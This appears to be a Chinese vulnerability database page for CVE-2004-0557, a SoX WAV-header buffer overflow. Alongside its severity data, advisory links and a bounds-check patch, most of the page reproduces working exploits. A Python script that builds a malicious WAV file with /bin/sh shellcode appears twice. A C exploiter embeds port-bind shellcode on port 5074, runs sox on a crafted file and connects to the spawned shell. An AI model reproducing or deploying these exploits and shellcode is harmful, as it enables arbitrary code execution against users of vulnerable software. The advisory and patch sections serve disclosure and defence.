CVE-2004-0557
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2010-08-21 00:20:46
NMCOEP    

[原文]Multiple buffer overflows in the st_wavstartread function in wav.c for Sound eXchange (SoX) 12.17.2 through 12.17.4 allow remote attackers to execute arbitrary code via certain WAV file header fields.


[CNNVD]SoX st_wavstartread()远程缓冲区溢出漏洞(CNNVD-200408-106)

        
        SoX是一款开放源代码的音频格式转换工具。
        SoX在处理WAV文件时存在缓冲区溢出问题,远程攻击者可以利用这个漏洞构建恶意文件,诱使用户使用SoX处理,可能以进程权限在系统上执行任意指令。
        问题存在于'wav.c'文件的st_wavstartread()函数中,'sox'和'play'命令在调用此函数时不正确检查用户提供的变量数据,提交超长数据可破坏缓冲区,存在执行任意指令的可能。攻击者可以利用恶意文件诱使用户来处理以利用此漏洞。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sox:sox:12.17.2
cpe:/o:redhat:enterprise_linux_desktop:3.0Red Hat Desktop 3.0
cpe:/o:redhat:enterprise_linux:3.0::workstation
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/a:sox:sox:12.17.3
cpe:/o:redhat:enterprise_linux:3.0::advanced_servers
cpe:/o:redhat:fedora_core:core_2.0
cpe:/o:redhat:fedora_core:core_1.0
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/o:conectiva:linux:10.0Conectiva Linux 10.0
cpe:/o:conectiva:linux:8.0Conectiva Conectiva Linux 8.0
cpe:/o:conectiva:linux:9.0Conectiva Linux 9.0
cpe:/a:sox:sox:12.17.4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9801Buffer overflow in the JBIG2Bitmap::JBIG2Bitmap function in JBIG2Stream.cc in Xpdf, as used in products such as gpdf, kpdf, pdftohtml, poppl...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0557
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0557
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-106
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10819
(VENDOR_ADVISORY)  BID  10819
http://www.redhat.com/support/errata/RHSA-2004-409.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:409
https://bugzilla.fedora.us/show_bug.cgi?id=1945
(UNKNOWN)  FEDORA  FLSA:1945
http://xforce.iss.net/xforce/xfdb/16827
(VENDOR_ADVISORY)  XF  sox-wav-bo(16827)
http://www.gentoo.org/security/en/glsa/glsa-200407-23.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200407-23
http://www.debian.org/security/2004/dsa-565
(UNKNOWN)  DEBIAN  DSA-565
http://secunia.com/advisories/12175
(UNKNOWN)  SECUNIA  12175
http://lwn.net/Articles/95530/
(UNKNOWN)  FEDORA  FEDORA-2004-244
http://lwn.net/Articles/95529/
(UNKNOWN)  FEDORA  FEDORA-2004-235
http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0014.html
(UNKNOWN)  VULNWATCH  20040728 SoX buffer overflows when handling .WAV files
http://www.mandriva.com/security/advisories?name=MDKSA-2004:076
(UNKNOWN)  MANDRAKE  MDKSA-2004:076
http://seclists.org/fulldisclosure/2004/Jul/1227.html
(UNKNOWN)  FULLDISC  20040728 SoX buffer overflows when handling .WAV files
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000855
(UNKNOWN)  CONECTIVA  CLA-2004:855

- 漏洞信息

SoX st_wavstartread()远程缓冲区溢出漏洞
危急 边界条件错误
2004-08-06 00:00:00 2005-10-20 00:00:00
本地  
        
        SoX是一款开放源代码的音频格式转换工具。
        SoX在处理WAV文件时存在缓冲区溢出问题,远程攻击者可以利用这个漏洞构建恶意文件,诱使用户使用SoX处理,可能以进程权限在系统上执行任意指令。
        问题存在于'wav.c'文件的st_wavstartread()函数中,'sox'和'play'命令在调用此函数时不正确检查用户提供的变量数据,提交超长数据可破坏缓冲区,存在执行任意指令的可能。攻击者可以利用恶意文件诱使用户来处理以利用此漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Ulf Harnhammar提供如下补丁方案:
        --- wav.c.old 2002-12-31 04:19:22.000000000 +0100
        +++ wav.c 2004-07-18 19:25:46.000000000 +0200
        @@ -917,6 +917,10 @@
        } else if(strncmp(magic,"ICRD",4) == 0){
        st_readdw(ft,&len);
        len = (len + 1) & ~1;
        + if (len > 254) {
        + fprintf(stderr, "Possible buffer overflow hack attack (ICRD)!\n");
        + exit(109);
        + }
        st_reads(ft,text,len);
        if (strlen(ft->comment) + strlen(text) < 254)
        {
        @@ -926,6 +930,10 @@
        } else if(strncmp(magic,"ISFT",4) == 0){
        st_readdw(ft,&len);
        len = (len + 1) & ~1;
        + if (len > 254) {
        + fprintf(stderr, "Possible buffer overflow hack attack (ISFT)!\n");
        + exit(110);
        + }
        st_reads(ft,text,len);
        if (strlen(ft->comment) + strlen(text) < 254)
        {
        厂商补丁:
        SoX
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://sox.sourceforge.net/

- 漏洞信息 (369)

SoX Local Buffer Overflow Exploit (EDBID:369)
linux local
2004-08-01 Verified
0 Serkan Akpolat
N/A [点击下载]
# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
# Tested Under Slackware 9.1
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
# Homepage: http://deicide.siyahsapka.org
# Greets to: Virulent
# deicide@gate:~$ play britney.wav
# sh-2.05b$

# "jmp %esp" from libc.so , change this if needed..
retJmpEsp=0x4029824B

# intel_order() from MOSDEF
def intel_order(myint):
str=""
a=chr(myint % 256)
myint=myint >> 8
b=chr(myint % 256)
myint=myint >> 8
c=chr(myint % 256)
myint=myint >> 8
d=chr(myint % 256)
str+="%c%c%c%c" % (a,b,c,d)
return str

# Wave Header
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\
"\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\
"\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\
"\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\
"\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\
"\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\
"\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\
"\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode
wavFile = open("britney.wav", "wb")
wavFile.write(evilBuf)
wavFile.close()
print "Evil Song has been created :Pp"

# milw0rm.com [2004-08-01]
		

- 漏洞信息 (374)

SoX Local Buffer Overflow Exploiter (Via Crafted WAV File) (EDBID:374)
linux local
2004-08-04 Verified
0 Rave
N/A [点击下载]
--------------------------------- Begin Code: sox-exploiter.c ---------------------------------
/*


  Copyright Rosiello Security 2004
               http://www.rosiello.org


CVE Reference: CAN-2004-0557
Bug Type: Stack Overflow
Date: 01/08/2004


Ulf Harnhammar reported that there are two buffer overflows in the 'sox' and 'play' commands.
The flaws reside in the st_wavstartread() function in 'wav.c', where the function reads data
based on a user-supplied size variable into a buffer without checking to see if the specified
amount of data will fit into the buffer.

The report indicates that older versions, including 12.17.1, 12.17 and 12.16, are not affected.

Vendors were reportedly notified on July 18, 2004.
Impact: A remote user can create a WAV file that, when processed by the target user, will execute
arbitrary code on the target system with the privileges of the SoX process.
Solution: No vendor solution was available at the time of this entry.

**************************************************************************************************
!!! DO NOT USE THIS SOFTWARE TO BREAK THE LAW !!!

This exploit will create a malevolent .wav file that will execute the shellcode (it's a
port_bind() opening the port 5074)
Example:
$./sox-exploiter laser.wav malevolent.wav 0
When you play the file malevolent.wav the shellcode is executed.

AUTHOR: rave --> rave@rosiello.org
AUTHOR: Angelo Rosiello --> angelo@rosiello.org
WEB : http://www.rosiello.org
*/


#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>

 /* used for stating */
#include <sys/types.h>
#include <sys/stat.h>

/* used for mmap */
#include <sys/mman.h>

/* perror() */
#include <errno.h>

/* strstr */
#include <string.h>


enum { suse, redhat, slackware };


struct tr
{
  char *OS;
  unsigned long ret;
  } target [] = {

     "SuSe 9.1 Pro",
     0xbfffe9f0,


     "Redhat 9.1",
     0x41414141
   };

signed char
shellcode[]=
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

/*
 * s0t4ipv6@Shellcode.com.ar
 * x86 portbind a shell in port 5074
 * 92 bytes.
 */

"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x40" // incl %eax
"\x89\xc3" // movl %eax,%ebx
"\x50" // pushl %eax
"\x40" // incl %eax
"\x50" // pushl %eax
"\x89\xe1" // movl %esp,%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x31\xd2" // xorl %edx,%edx
"\x52" // pushl %edx
"\x66\x68\x13\xd2" // pushw $0xd213
"\x43" // incl %ebx
"\x66\x53" // pushw %bx
"\x89\xe1" // movl %esp,%ecx
"\x6a\x10" // pushl $0x10
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x89\xe1" // movl %esp,%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x40" // incl %eax
"\x89\x44\x24\x04" // movl %eax,0x4(%esp,1)
"\x43" // incl %ebx
"\x43" // incl %ebx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x83\xc4\x0c" // addl $0xc,%esp
"\x52" // pushl %edx
"\x52" // pushl %edx
"\x43" // incl %ebx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchgl %eax,%ebx
"\x89\xd1" // movl %edx,%ecx
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
"\x41" // incl %ecx
"\x80\xf9\x03" // cmpb $0x3,%cl
"\x75\xf6" // jnz <shellcode+0x40>
"\x52" // pushl %edx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x52" // pushl %edx
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80
;

signed long shelladdr =0xbfffe9f0;//0xbfffe9d8;//0xbffff3ea;

char *memap;
char *fs_io(char *filename, char *data, mode_t flags, long *size)
{
struct stat status;
int fd;

if ( data == NULL) {

if ( lstat (filename,&status) < 0)
{
 printf("Input File not found\n");
 exit(-1);
}

if ((fd=open ( filename , flags,0666)) == -1) {
  perror("open");
  exit (-1);
  }

   memap=mmap(0,status.st_size,PROT_READ|PROT_WRITE,MAP_PRIVATE,fd,0);

  if ( memap == NULL)
   {printf("allocation problem\n"); exit (-1);}

   (*(long *)size) = status.st_size;
   return (char *)memap;
  }


}


int connect_to( char *addr)
{
struct sockaddr_in sin4;
int sock;
char in [512];
char out [512];
char banner[512];
size_t size;

   sin4.sin_family = AF_INET;
   sin4.sin_addr.s_addr = inet_addr(addr);
   sin4.sin_port = htons(5074);

   sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (!sock)
   {
     return -1;
   }

  if (connect (sock,(struct sockaddr *)&sin4,sizeof(struct sockaddr_in)) ==-1)
  {

    return -1;
    }

    printf("[+] Exploit success\n");
    size=sprintf(banner,"%s","uname -a;\n");
    write ( sock, banner, size );

    while ( 1 )
    {
    size=read (sock,in,sizeof(in));
    in[size] = '\0';
    printf("%s\n",in);


    scanf("%s",&out);
    strcat(out,"\n");

    write (sock, out,strlen(out));
    memset(in,'\0',sizeof(in));
    memset(out,'\0',sizeof(out));
    }


}

void usage(char *file)
{
int i;
printf("USAGE:\n");
printf("SoX Exploiter by Rosiello Security\n");
printf("%s source.wav vulnerable.wav target\n", file);
for (i=0;i < 2;i++)
printf("TARGET: %d %s %x\n",i,target[i].OS,target[i].ret);
exit(0);
}


int main(int argc, char **argv)
{

  char *ptr,*tmp;
  int fd,count;
  long sizefield,sizeloc;
  int size;
  char payload[500];
  pid_t pid;
  int opt;
  if ((argc) != 4)
    usage(argv[0]);
  opt=atoi(argv[3]);

  memap = fs_io(argv[1],NULL,O_RDWR,&size);

  printf("[+] Sox Exploiter by Rosiello Security\n");
  printf("[+] Opened %s size : %d\n",argv[1],size);


  ptr = memap;
  count =0;
  do
  {
   ptr++;
   if ((strncmp("INFOICRD",ptr,8)==0)) break;

  } while ( (count ++ !=size) );

  tmp = (char *)malloc ( size + 512);
  tmp = memap;

  ptr +=8;
  sizefield = (long) ptr[0];
  sizeloc = (long) (count + 8)+1;

  tmp[sizeloc]=01;
  tmp[sizeloc+1]=02;

  if ((fd=open ( argv[2] , O_WRONLY | O_CREAT | O_TRUNC,0666)) == -1) {
   perror("open");
   return -1;
  }

  sizeloc +=2;
  write(fd,tmp,sizeloc);

  memset(payload,0x2e,318);

  size=sprintf(payload+318,"%s%s",((char *)&target[opt].ret),shellcode);


  write (fd,payload,sizeof(payload));
  close(fd);

  size = 0x0102 - size;

  printf("[+] Coded by rave & Angelo Rosiello\n");
  printf("[+] Writing evil code into %s\n", argv[2]);
  printf("[+] Org sizefield = %d new sizefield = %d\n",sizefield,0x0102);
  printf("[+] Overflowing the buffer with %d Bytes\n",size);
  printf("[+] Executing /usr/bin/sox\n");
  printf("[+] Connecting to localhost\n");

  pid = fork();
  if (pid ==0) {
    execl("/usr/bin/sox","sox",argv[2],"-t","ossdsp","/dev/dsp" ,NULL);

   };

  sleep(1);
  if ((connect_to("127.0.0.1")) <0)
    printf("[-] Exploit failed\n");

  return EXIT_SUCCESS;
}
---------------------------------- End Code: sox-exploiter.c ----------------------------------

// milw0rm.com [2004-08-04]
		

- 漏洞信息 (F33934)

evil_song.py (PacketStormID:F33934)
2004-08-05 00:00:00
Serkan Akpolat  deicide.siyahsapka.org
exploit,local
linux,slackware
CVE-2004-0557
[点击下载]

Local exploit that makes use of the WAV header handling vulnerability in SoX versions 12.17.4-r1 and below. Tested under Slackware 9.1.

# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
# Tested Under Slackware 9.1
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
# Homepage: http://deicide.siyahsapka.org
# Greets to: Virulent 
# deicide@gate:~$ play britney.wav 
# sh-2.05b$ 

# "jmp %esp" from libc.so , change this if needed..
retJmpEsp=0x4029824B

# intel_order() from MOSDEF
def intel_order(myint):
	str=""
	a=chr(myint % 256)
	myint=myint >> 8
	b=chr(myint % 256)
	myint=myint >> 8
	c=chr(myint % 256)
	myint=myint >> 8
	d=chr(myint % 256)
	str+="%c%c%c%c" % (a,b,c,d)
	return str

# Wave Header
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\
        "\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\
        "\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\
        "\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\
        "\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\
        "\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\
        "\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\
        "\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode
wavFile = open("britney.wav", "wb")
wavFile.write(evilBuf)
wavFile.close()
print "Evil Song has been created :Pp"

    

- 漏洞信息 (F33905)

soxWAVFileBufferOverflowExploit.c (PacketStormID:F33905)
2004-08-04 00:00:00
Angelo Rosiello,rosiello,Johnny Mast  rosiello.org
exploit,local
CVE-2004-0557
[点击下载]

Local exploit that makes use of the WAV header handling vulnerability in SoX versions 12.17.4-r1 and below.

- 漏洞信息

8267
SoX .WAV File Processing Multiple Field Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

SoX contains a flaw that may allow a malicious user to execute arbitrary code on a remote system. The issue is triggered when a user executes a specially crafted .wav file created by a malicious user which will overflow a buffer in the st_wavstartread() function of wav.c. It is possible that the flaw may allow remote code execution on the local system resulting in a loss of confidentiality and integrity.

- 时间线

2004-07-29 Unknow
2004-08-02 Unknow

- 解决方案

Upgrade to version 12.17.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站